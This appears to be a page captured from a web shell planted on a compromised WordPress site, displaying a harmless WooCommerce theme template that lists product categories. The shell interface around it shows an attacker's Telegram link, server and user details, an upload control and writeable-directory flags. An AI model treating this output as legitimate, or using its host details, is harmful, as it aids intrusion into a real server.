https://t.me/AnonymousX5
Server : Apache
System : Linux ls31.server.ly 3.10.0-962.3.2.lve1.5.68.el7.x86_64 #1 SMP Wed Apr 6 11:12:23 UTC 2022 x86_64
User : medchoco ( 2906)
PHP Version : 8.3.16
Disable Function : mail
Directory :  /home/medchoco/www/wp-content/themes/puca/woocommerce/layout-categories/themes/supermaket2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/medchoco/www/wp-content/themes/puca/woocommerce/layout-categories/themes/supermaket2/grid.php
<?php

$count = 0;


?>
<?php 
     foreach ($all_categories as $cat) {
     	
        $cat_id 	= 	$cat->term_id;    
        $cat_name 	= 	$cat->name;    
        $cat_slug 	= 	$cat->slug;    
        $cat_count 		= 	$cat->count;

		$thumbnail_id = get_term_meta( $cat_id, 'thumbnail_id', true );
		$image = wp_get_attachment_url( $thumbnail_id );
        ?> 

			<div class="item">

				<div class="item-cat">
					<?php if ( !empty($image) ) { ?>
						<a class="cat-img" href="<?php echo esc_url( get_term_link($cat->slug, 'product_cat') ); ?>">
							<img src="<?php echo esc_url($image); ?>" alt="<?php echo esc_attr($cat_name); ?>">
						</a>
					<?php } ?>

					<a class="cat-name" href="<?php echo esc_url( get_term_link($cat_slug, 'product_cat') ); ?>">
						<?php echo esc_html($cat_name); ?>

						<span class="count-item">(<?php echo esc_html($cat_count).' '.esc_html__('items','puca'); ?>)</span>
					</a>


				</div>

			</div>
		<?php 
		$count++;
		?>
        <?php     
	}
?>

<?php wp_reset_postdata(); ?>

https://t.me/AnonymousX5 - 2025